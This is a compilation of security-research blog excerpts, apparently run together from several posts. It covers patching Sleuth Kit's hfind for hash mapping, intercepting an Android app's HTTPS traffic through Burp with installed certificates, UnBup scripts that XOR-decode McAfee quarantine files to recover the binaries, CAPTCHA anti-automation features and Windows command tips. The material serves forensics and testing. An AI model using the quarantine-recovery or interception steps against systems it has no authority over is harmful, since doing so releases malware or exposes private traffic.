pmedina@forensic:~$ md5sum /files/RedDrive.zip
2e54d3fb64ff68607c38ecb482f5fa25  /files/RedDrive.zip
pmedina@forensic:~$ hfind /tmp/example-rds-unique.txt
2e54d3fb64ff68607c38ecb482f5fa25
2e54d3fb64ff68607c38ecb482f5fa25        RedDrive.zip

pmedina@forensic:~$ head -1 /tmp/example-rds-unique.txt > /tmp/example-rds-unique-hm-sha1.txt
pmedina@forensic:~$ tail -n +2 /tmp/example-rds-unique.txt | awk -F, '{print $1","$2","$3","tolower($1)","$5","$6","$7","$8}' >> /tmp/example-rds-unique-hm-sha1.txt
pmedina@forensic:~$ head -3 /tmp/example-rds-unique-hm-sha1.txt
"SHA-1","MD5","CRC32","FileName","FileSize","ProductCode","OpSystemCode","SpecialCode"
"000e9b6b962bdbcd5b0ff01635a417cce833490e","b0efd5eacfe6f1e251b8870d486326af","c8f43198","000e9b6b962bdbcd5b0ff01635a417cce833490e",96,0,"WIN",""
"001121f9dc35ab520b207908f0f26c48979ed497","6efca4942c73ab0b17875fd729b2d03a","2e929525","001121f9dc35ab520b207908f0f26c48979ed497",72,0,"WIN",""

pmedina@forensic:~$ hfind -i nsrl-md5 /tmp/example-rds-unique-hm-sha1.txt
Index Created

pmedina@forensic:~$ hfind /tmp/example-rds-unique-hm-sha1.txt 2e54d3fb64ff68607c38ecb482f5fa25
2e54d3fb64ff68607c38ecb482f5fa25        d9c40dd2f1fb08927e773a0dc70d75fedd71549e
pmedina@forensic:~$ sha1sum /files/RedDrive.zip
d9c40dd2f1fb08927e773a0dc70d75fedd71549e  /files/RedDrive.zip 

Modifying ‘hfind’ to hashmap automatically

pmedina@forensic:~$ tar -zxf sleuthkit-3.2.3.tar.gz
pmedina@forensic:~$ cd sleuthkit-3.2.3/

pmedina@forensic:~/sleuthkit-3.2.3$ ./configure
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... no
checking for mawk... mawk
..
..
config.status: creating tools/timeline/Makefile
config.status: creating tests/Makefile
config.status: creating samples/Makefile
config.status: creating man/Makefile
config.status: creating tsk3/tsk_config.h
config.status: executing depfiles commands
config.status: executing libtool commands
config.status: executing tsk3/tsk_incs.h commands
pmedina@forensic:~/sleuthkit-3.2.3$

pmedina@forensic:~/sleuthkit-3.2.3$ mv tsk3/hashdb/nsrl_index.c tsk3/hashdb/nsrl_index.c.ORIG
pmedina@forensic:~/sleuthkit-3.2.3$ cat ../nsrl_index.c.patch
172,174c172
<                 &str[1 + TSK_HDB_HTYPE_SHA1_LEN + 3 +
<                      TSK_HDB_HTYPE_MD5_LEN + 3 + TSK_HDB_HTYPE_CRC32_LEN +
<                      3];
---
>                 &str[1 + TSK_HDB_HTYPE_SHA1_LEN + 3];
331,333c329
<                 &str[1 + TSK_HDB_HTYPE_SHA1_LEN + 3 +
<                      TSK_HDB_HTYPE_MD5_LEN + 3 + TSK_HDB_HTYPE_CRC32_LEN +
<                      3];
---
>                 &str[1];
pmedina@forensic:~/sleuthkit-3.2.3$ patch tsk3/hashdb/nsrl_index.c.ORIG -i ../nsrl_index.c.patch -o tsk3/hashdb/nsrl_index.c
patching file tsk3/hashdb/nsrl_index.c.ORIG
pmedina@forensic:~/sleuthkit-3.2.3$

pmedina@forensic:~/sleuthkit-3.2.3$ cat ../tm_lookup.c.patch
1022c1022
<             if (dbtype != 0) {
---
>             /* if (dbtype != 0) { */
1024c1024
<                 tsk_errno = TSK_ERR_HDB_UNKTYPE;
---
>                 tsk_errno = TSK_ERR_HDB_UNSUPTYPE;
1026c1026
<                          "hdb_open: Error determining DB type (MD5sum)");
---
>                          "hdb_open: hashmap cannot work on DB type (MD5sum)");
1028c1028
<             }
---
>             /* } */
1032c1032
<             if (dbtype != 0) {
---
>             /* if (dbtype != 0) { */
1034c1034
<                 tsk_errno = TSK_ERR_HDB_UNKTYPE;
---
>                 tsk_errno = TSK_ERR_HDB_UNSUPTYPE;
1036c1036
<                          "hdb_open: Error determining DB type (HK)");
---
>                          "hdb_open: hashmap cannot work on DB type (HK)");
1038c1038
<             }
---
>             /* } */
pmedina@forensic:~/sleuthkit-3.2.3$ mv tsk3/hashdb/tm_lookup.c tsk3/hashdb/tm_lookup.c.ORIG^C
pmedina@forensic:~/sleuthkit-3.2.3$ patch tsk3/hashdb/tm_lookup.c.ORIG -i ../tm_lookup.c.patch -o tsk3/hashdb/tm_lookup.c
patching file tsk3/hashdb/tm_lookup.c.ORIG
pmedina@forensic:~/sleuthkit-3.2.3$

pmedina@forensic:~/sleuthkit-3.2.3$ make
Making all in tsk3
..
..
make[1]: Entering directory `/home/pmedina/sleuthkit-3.2.3/tsk3'
Making all in man
make[1]: Entering directory `/home/pmedina/sleuthkit-3.2.3/man'
make[1]: Nothing to be done for `all'.
make[1]: Leaving directory `/home/pmedina/sleuthkit-3.2.3/man'
make[1]: Entering directory `/home/pmedina/sleuthkit-3.2.3'
make[1]: Nothing to be done for `all-am'.
make[1]: Leaving directory `/home/pmedina/sleuthkit-3.2.3'
pmedina@forensic:~/sleuthkit-3.2.3$ sudo cp tools/hashtools/hfind /usr/local/bin/hashmap
pmedina@forensic:~/sleuthkit-3.2.3$ cd ..
pmedina@forensic:~$ hashmap /tmp/example-rds-unique.txt 2e54d3fb64ff68607c38ecb482f5fa25
2e54d3fb64ff68607c38ecb482f5fa25        d9c40dd2f1fb08927e773a0dc70d75fedd71549e
pmedina@forensic:~$ hashmap /tmp/example-rds-unique.txt d9c40dd2f1fb08927e773a0dc70d75fedd71549e
d9c40dd2f1fb08927e773a0dc70d75fedd71549e        2e54d3fb64ff68607c38ecb482f5fa25
pmedina@forensic:~$

• Phone: Galaxy S II i777 (AT&T Model)
• ROM: CyanogenMod 9 Nightly build 07/02/2012
• Kernel: Siyah Kernel v3.4.3
• Rooted: Yes

Initial proxy setup

Application Proxying

• https://github.com/Foundstone/FS-SSL-App-Test/raw/master/fs-ssl-app-test.apk

• https://github.com/Foundstone/FS-SSL-App-Test

adb logcat | findstr FS

adb logcat | grep FS

$ adb logcat | grep FS
W/ActivityManager( 3841): No content provider found for permission revoke: file:///data/local/tmp/FS SSL App Test.apk

$ adb install FS\ SSL\ App\ Test.apk
239 KB/s (10513 bytes in 0.042s)
 pkg:/data/local/tmp/FS SSL App Test.apk
Success

$ adb logcat | grep FSFS
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting application...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting HTTPS request...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Set URL...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Open Connection...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Get the input stream...
D/FSFSFSFSFSFSFSFSFS(31187): [-] EXCEPTION: javax.net.ssl.SSLHandshakeException: java.security.cert.CertPathValidatorException: Trust anchor for certification path not found.

EXCEPTION: javax.net.ssl.SSLHandshakeException: java.security.cert.CertPathValidatorException: Trust anchor for certification path not found.

$ adb push PortSwiggerCA.cer /sdcard/
30 KB/s (712 bytes in 0.23s)

$ adb logcat | grep FSFS
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting application...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting HTTPS request...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Set URL...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Open Connection...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Get the input stream...
D/FSFSFSFSFSFSFSFSFS(31187): [-] EXCEPTION: java.io.IOException: Hostname 'www.foundstone.com' was not verified

EXCEPTION: java.io.IOException: Hostname 'www.foundstone.com' was not verified

$ adb push www.foundstone.com.cer /sdcard/
11 KB/s (616 bytes in 0.051s)

$ adb logcat | grep FSFS
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting application...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Starting HTTPS request...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Set URL...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Open Connection...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Get the input stream...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Create a buffered reader to read the response...
D/FSFSFSFSFSFSFSFSFS(31187): [+] Read all of the return....
D/FSFSFSFSFSFSFSFSFS(31187): [+] SUCCESS
D/FSFSFSFSFSFSFSFSFS(31187): [+] SUCCESS
D/FSFSFSFSFSFSFSFSFS(31187): [+] SUCCESS

Some notes

A Better Way - FS Cert Installer

• https://play.google.com/store/apps/details?id=com.foundstone.certinstaller

1. Install the application using the market or the apk file from github.
2. Set the URL, proxy IP and proxy port.
3. Install the CA certificate which will most likely be the Burp certificate. Name it anything and enter the lock pin or pattern used on the phone. The pin or pattern is used here by the KeyChain activity not the installer app.
4. Change the certificate on Burp to generate a certificate with a specific hostname. Install the site certificate.
5. Test your application!

1. You are a corporate A/V administrator and A/V misidentified a user’s file
2. You are a malware analyst and would like to dissect the detected binary
3. You are a home user and A/V grabbed a file you wanted (think netcat or a sysinternals tool) and the restore function did not work

How McAfee deactivation works

1. Creates a metadata text file
2. Performs a bitwise XOR on the metadata file and binary with a well-known key (0x6A)
3. Combines the original binary and metadata text file into a single file using Microsoft’s compound document format
4. Stores the file (with .BUP extension) in a quarantine folder defined by the Quarantine Manager Policy (default is C:\QUARANTINE\)

Triggering Antivirus to Create a BUP

 $ md5sum.exe ArtemisTest.exe
5db32a316f079fe7947100f899d8db86 *ArtemisTest.exe

Extracting the BUP in Windows

• 7-zip (Used to decompress the Microsoft compound document format)
• Bitwise XOR binary such as: xor.exe

• Details
• File_0

 $ md5sum.exe Details
c0bb879bdfd5b5277fc661da602f7460 *Details

$ md5sum.exe File_0
02ab0a6723bca2e8b6b70571680210a9 *File_0

 C:\QUARANTINE>xor.exe Details Details.txt 0X6A

C:\QUARANTINE>xor.exe File_0 Captured.exe 0X6A

• A/V detection name - Useful for discovering more information about the detection
• Major and minor versions of A/V engine - Can be used to troubleshoot why some hosts detect and others miss
• Major and minor versions of A/V DATs - Can be used to troubleshoot why some hosts detect and others miss
• When the file was captured (Creation fields) - Helps you create a timeline if detected by On-Access scan
• Time zone of host - Useful for timeline
• Original file name - Often reveals a good amount of information about the binary

 [Details]
DetectionName=Artemis!5DB32A316F07
DetectionType=0
EngineMajor=5400
EngineMinor=1158
DATMajor=6771
DATMinor=0
DATType=2
ProductID=12106
CreationYear=2012
CreationMonth=7
CreationDay=14
CreationHour=13
CreationMinute=25
CreationSecond=18
TimeZoneName=Eastern Daylight Time
TimeZoneOffset=240
NumberOfFiles=1
NumberOfValues=5

--snip—

[File_0]
ObjectType=5
OriginalName=C:\USERS\REDACTED\DESKTOP\ARTEMISTEST.EXE
WasAdded=0

 $ md5sum.exe Captured.exe
5db32a316f079fe7947100f899d8db86 *Captured.exe   <- This matches

$ md5sum.exe Details.txt
46c09e5ba29658a69527ca32c6895c08 *Details.txt

Extracting the BUP in Linux

The UnBup Tool

 Usage:  UnBup.sh [option] 

  -d = details file only (no executable)
  -h = help menu
  -s = safe executable (extension is .ex)

Please report bugs to Tony.Lee@Foundstone.com and Travis_Rosiek@McAfee.com

1. No options - Yields the Details.txt and original binary
2. - d option - Yields the Details.txt file only (No binary)
3. - s option - Yields the Details.txt file and the binary, with an extension of .ex to prevent accidental execution

Demo: No Options

 UnBup.sh file.bup

Demo: The -d Option

 UnBup.sh -d file.bup

Demo: The -s Option

 UnBup.sh -s file.bup

How it works (simplistically)

1. xxd to convert the binary to hex
2. Performing the XOR
3. Converting the decimal result to hex
4. The step to convert hex to ASCII is to show you the readable output (not performed in script)

The Shell Script – (SLOW – You may want to use the Perl code below)

#!/bin/bash
# UnBup
# Tony Lee and Travis Rosiek
# Tony.Lee-at-Foundstone.com
# Travis_Rosiek-at-McAfee.com
# Bup Extraction tool - Reverse a McAfee Quarantined Bup file with Bash
# Input:  Bup File
# Output: Details.txt file and original binary (optional)
# Note:  This does not put the file back to the original location (output is to current directory)
# Requirements - 7z (7zip), xxd (hexdumper), awk, cut, grep

##### Function Usage #####
# Prints usage statement
##########################
Usage()
{
echo "UnBup v1.0
Usage:  UnBup.sh [option] 

  -d = details file only (no executable)
  -h = help menu
  -s = safe executable (extension is .ex)

Please report bugs to Tony.Lee-at-Foundstone.com and Travis_Rosiek-at-McAfee.com"
}

# Detect the absence of command line parameters.  If the user did not specify any, print usage statement 
[[ -n "$1" ]] || { Usage; exit 0; }


##### Function XorLoop #####
# Loop through files to perform bitwise xor with key write binary to file
############################
XorLoop()
{
for byte in `xxd -c 1 -p $INPUT`; do   # For loop converts binary to hex 1 byte per line
        #echo "$byte"
        decimal=`echo $((0x$byte ^ 0x6A))` # xor with 6A and convert to decimal
        #echo "decimal = $decimal"
        hex=`echo "obase=16; $decimal" | bc` # Convert decimal to hex
        #echo "hex = $hex"
        echo -ne "\x$hex" >> $OUTPUT;  # Write raw hex to output file
done
}


##### Function CreateDetails #####
# Create the Details.txt file with metadata on bup'd file
##################################
CreateDetails()
{
# Check to see if the text file exists, if not let the user know
 [[ -e "$BupName" ]] || { echo -e "\nError:  The file $BupName does not exist\n"; Usage; exit 0; }
 echo "Extracting encoded files from Bup";
 7z e $BupName > /dev/null;  # Extract the xor encoded files (Details and File_0)
 INPUT=Details;    # Set INPUT variable to the Details file to get the details and filename
 OUTPUT=Details.txt;   # Set OUTPUT variable to Details.txt filename
 echo "Creating the Details.txt file";
 XorLoop;    # Call XorLoop function with variables set
}


##### Function ExtractBinary #####
# Extracts the original binary from the bup file
##################################
ExtractBinary()
{
 Field=`grep OriginalName Details.txt | awk -F '\' '{ print NF }'`; # Find the binary name field
 OUTNAME=`grep OriginalName Details.txt | cut -d '\' -f $Field`;
 OUTPUT=`echo "${OUTNAME%?}"`;      # Get rid of trailing /r
 INPUT=File_0;
 echo "Extracting the binary";
 XorLoop;        # Call xor function again
}

# Parse the command line options
case $1 in
 -d) BupName=$2; CreateDetails;;
 -h) Usage; exit 0;;       # Details.txt file only
 -s) BupName=$2; CreateDetails; ExtractBinary; mv $OUTPUT `echo "${OUTPUT%?}"`;; # Safe binary
 *) BupName=$1; CreateDetails; ExtractBinary;;      # Full process of the bup
esac

rm Details File_0;      # Clean up xor'd files

Our Perl script (MUCH FASTER – You probably want to use this over the shell script)

 ./xor.pl
Simple xor script
  Usage: ./xor.pl [Input File] [Output File]

Tony.Lee@Foundstone.com
./xor.pl 7dc7ed19123df0.bup 7dc7ed19123df0.xord

  #!/usr/bin/perl
# Simple xor decoder
# Written because I could not find one on the Intertubes
# Email me with problems at Tony.Lee-at-Foundstone.com

# Detection to make sure there are two arguments supplied (an input file and output file) 
if (@ARGV < 2) {
 die "Simple xor script\n  Usage: $0 <Input File> <Output File>\n\nTony.Lee-at-Foundstone.com\n";
}

# Open input file as read only to avoid accidentally modifying the file
open INPUT, "<$ARGV[0]" or die "Input file \"$ARGV[0]\" does not exist\n";

# Open the output file to write to it
open OUTPUT, ">$ARGV[1]" or die "Cannot open file \"$ARGV[1]\"";

# Loop until all bytes in the file are read
while (($n = read INPUT, $byte, 1) != 0) 
{ 
 $decode = $byte ^ 'j';  # xor byte against ASCII 'j' = Hex 0x6A = Dec 106 
 print OUTPUT $decode;  # write the decoded output to a file
}

close INPUT;
close OUTPUT;

  #!/usr/bin/perl
# UnBup
# Tony Lee and Travis Rosiek
# Tony.Lee-at-Foundstone.com
# Travis_Rosiek-at-McAfee.com
# Bup Extraction tool - Reverse a McAfee Quarantined Bup file with Bash
# Input:  Bup File
# Output: Details.txt file and original binary (optional)
# Note:  This does not put the file back to the original location (output is to current directory)


# Detect the absence of command line parameters.  If the user did not specify any, print usage statement 
if (@ARGV == 0) { Usage(); exit(); }


##### Function Usage #####
# Prints usage statement
##########################
sub Usage
{
print "UnBup v1.0
Usage:  UnBup.pl [option] 

  -d = details file only (no executable)
  -h = help menu
  -s = safe executable (extension is .ex)

Please report bugs to Tony.Lee-at-Foundstone.com and Travis_Rosiek-at-McAfee.com\n"
}


##### Function XorLoop #####
# Loop through files to perform bitwise xor with key write binary to file
# Input arguments input filename and output filename
# example:  XorLoop(Details, Details.txt)
############################
sub XorLoop
{
 # Open input file as read only to avoid accidentally modifying the file
 open INPUT, "<$_[0]" or die "Input file \"$_[0]\" does not exist\n";

 # Open the output file to write to it
 open OUTPUT, ">$_[1]" or die "Cannot open file \"$_[1]\"";

 # Loop until all bytes in the file are read
 while (($n = read INPUT, $byte, 1) != 0) 
 { 
  $decode = $byte ^ 'j';  # xor byte against ASCII 'j' = Hex 0x6A = Dec 106 
  print OUTPUT $decode;  # write the decoded output to a file
 }

 close INPUT;
 close OUTPUT;
}

##### Function CreateDetails #####
# Create the Details.txt file with metadata on bup'd file
##################################
sub CreateDetails
{
 $BupName=$_[0];
 # Check to see if the text file exists, if not let the user know
 unless(-e "$BupName") { print "\nError:  The file \"$BupName\" does not exist\n"; Usage; exit 0; }
 print "Extracting encoded files from Bup\n";
 `7z e $BupName`;   # Extract the xor encoded files (Details and File_0)
 print "Creating the Details.txt file\n";
 XorLoop("Details", "Details.txt"); # Call XorLoop function with variables set
}

##### Function ExtractBinary #####
# Extracts the original binary from the bup file
##################################
sub ExtractBinary
{
 $Field=`grep OriginalName Details.txt | awk -F '\\' '{ print NF }'`; # Find the binary name field
 $OUTNAME=`grep OriginalName Details.txt | cut -d '\\' -f $Field`; # Find the binary name
 $INPUT=File_0;
 print "Extracting the binary\n";
 XorLoop("$INPUT", "$OUTNAME");      # Call xor function again
}



if ($ARGV[0] eq "-d"){  # Print details file only
 CreateDetails($ARGV[1]);
 `rm Details File_0`; # Clean up original files
}
elsif ($ARGV[0] eq "-h"){ # Print usage statement
  Usage();
}
elsif ($ARGV[0] eq "-s"){ # Create "safe" binary
  CreateDetails($ARGV[1]);
  ExtractBinary();
  chop($OUTNAME);
  $OLD=$OUTNAME;   # Store original name in $OLD variable
  chop($OUTNAME);
  chop($OUTNAME);
  `mv $OLD $OUTNAME`;  # Rename the binary to remove that last E
  `rm Details File_0`;  # Clean up original files
}
else {
 CreateDetails($ARGV[0]); # Extract details file and binary
 ExtractBinary();
 `rm Details File_0`;  # Clean up original files
}

Final thoughts and coding challenge

1. Reduce the dependencies (No need for 7zip or xxd)
2. Code it in your favorite language (python, ruby, C, LUA… whatever you want)
3. Be as concise and clear as possible

 hexdump -C 7dc7ed19123df0.bup | head -n 1

00000000  d0 cf 11 e0 a1 b1 1a e1  00 00 00 00 00 00 00 00  |................|

• http://en.wikipedia.org/wiki/Compound_File_Binary_Format
• http://www.openoffice.org/sc/compdocfileformat.pdf

Anti-Automation Mechanisms

1. Closeness of noise to real text : The noise is of same style (i.e. alphanumeric) and superimposed on the real text. The font is of same size as original text and the text to be solved. This increases the difficulty of removing the noise and regular noise removal algorithms may be ineffective. The random background line serves to highlight the white border and also as a noise source.
2. Hard to Segment : The CAPTCHA solution and noise are mixed up in an unpredictable fashion with random positioning variation on X and Y axis. It may therefore be hard to segment various alphabets from each other single out individual characters for classification.
3. Anti-Classification :While writing custom solvers, statistical analysis is performed to on CAPTCHA text by plotting the pixel densities against X and Y axis to identify the correct characters. When text is superimposed with no clear indication on demarcation of text boundary, the classification techniques do not work.

Samples

• http://www.opensecurityresearch.com/files/captcha-exercise.zip

Where to start?

Command shell history

Command shell shortcuts

mode – adjusting the size of the command shell

color - Sets the default console foreground and background colors

COLOR [attr]
   attr        Specifies color attribute of console output

Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground.  Each digit can be any of the following values:

    0 = Black       8 = Gray
    1 = Blue        9 = Light Blue
    2 = Green       A = Light Green
    3 = Aqua        B = Light Aqua
    4 = Red         C = Light Red
    5 = Purple      D = Light Purple
    6 = Yellow      E = Light Yellow
    7 = White       F = Bright White

If no argument is given, this command restores the color to what it was when CMD.EXE started.

Title - Sets the window title for the command prompt window

TITLE [string] string       Specifies the title for the command prompt window.

findstr – (grep for Windows)

C:\>tasklist | findstr /i EXPLORER
explorer.exe         3404 Console                    1    119,884 K

C:\>netstat -an | findstr 135
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    [::]:135               [::]:0                 LISTENING

C:\>netstat -an | findstr 445
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  UDP    127.0.0.1:63445        *:*

write - the greatest shortcut ever

tree – graphical “text” directory listings

TREE [drive:][path] [/F] [/A]

   /F   Display the names of the files in each folder.
   /A   Use ASCII instead of extended characters.


C:\> tree /a /f c:\users

Folder PATH listing for volume PSV
Volume serial number is 8800-000
C:\USERS
+---Tony
|   |   test.exe
|   |   Sti_Trace.log
|   |
|   +---Contacts
|   |       Tony.contact
|   |
|   +---Desktop
|   |   |   cmd.txt
|   |   |   fixPrinter.bat
|   |   |   malicious.exe
|   |   |   research.txt
--snip--


 

type - when you can’t spare the GUI

TYPE [drive:][path]filename

C:\>type %TEMP%\readme.txt
"This is how you can read a text file from the command line"